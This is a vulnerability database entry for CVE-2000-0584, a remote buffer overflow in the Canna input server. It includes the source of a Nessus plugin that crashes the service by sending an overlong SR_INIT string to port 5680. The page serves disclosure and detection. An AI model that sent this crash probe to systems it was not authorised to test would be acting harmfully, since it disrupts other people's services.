Vulnerabilities > CVE-2000-0584

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
debian
freebsd
critical
nessus
exploit available

Summary

Buffer overflow in Canna input system allows remote attackers to execute arbitrary commands via an SR_INIT command with a long user name or group name.

Vulnerable Configurations

Part Description Count
OS
Debian
1
OS
Freebsd
1

Exploit-Db

descriptionCanna Canna 3.5 b2 Remote Buffer Overflow Vulnerability. CVE-2000-0584 . Remote exploit for linux platform
idEDB-ID:20061
last seen2016-02-02
modified2000-07-02
published2000-07-02
reporterUNYUN
sourcehttps://www.exploit-db.com/download/20061/
titleCanna Canna 3.5 b2 - Remote Buffer Overflow Vulnerability

Nessus

NASL familyGain a shell remotely
NASL idCANNA_OVERFLOW.NASL
descriptionThe remote host is running Canna, a service that processes Japanese input and translates it from kana to kanji. It was possible to make the remote Canna server crash by sending a SR_INIT command with a very long string. A remote attacker could use this to crash the service, or possibly execute arbitrary code.
last seen2020-06-01
modified2020-06-02
plugin id11114
published2002-08-29
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11114
titleCanna SR_INIT Command Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if(description)
{
 script_id(11114);
 script_bugtraq_id(1445);
 script_version ("1.14");
 script_cve_id("CVE-2000-0584");
 script_name(english:"Canna SR_INIT Command Remote Overflow");
 script_summary(english:"Checks if the remote Canna can be buffer overflown");

 script_set_attribute(attribute:"synopsis", value:
"The remote language translation service has a buffer overflow
vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Canna, a service that processes Japanese
input and translates it from kana to kanji.

It was possible to make the remote Canna server crash by sending a
SR_INIT command with a very long string.  A remote attacker could use
this to crash the service, or possibly execute arbitrary code." );
 # https://web.archive.org/web/20000819124158/http://archives.neohapsis.com/archives/vendor/2000-q2/0062.html
 script_set_attribute(
   attribute:"see_also",
   value:"http://www.nessus.org/u?5a347380"
 );
 script_set_attribute(
   attribute:"solution", 
   value:"Upgrade to the latest version of the software."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2002/08/29");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/07/05");
 script_cvs_date("Date: 2018/06/27 18:42:25");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
		    
 script_category(ACT_DESTRUCTIVE_ATTACK);
 script_family(english:"Gain a shell remotely");
 
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
		  
 script_require_ports(5680);
 exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

port = 5680;
if(!get_port_state(port))exit(0, "TCP port "+port+" is closed.");
soc = open_sock_tcp(port);
if(! soc) exit(1, "Cannot open TCP connection to port "+port+".");

  req = raw_string(0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 50) + 
        "3.3:" + crap(300) + raw_string(0);
  send(socket:soc, data:req);
  r = recv(socket:soc, length:4);
  close(soc);

if (service_is_dead(port: port, exit: 1) > 0)
  security_hole(port);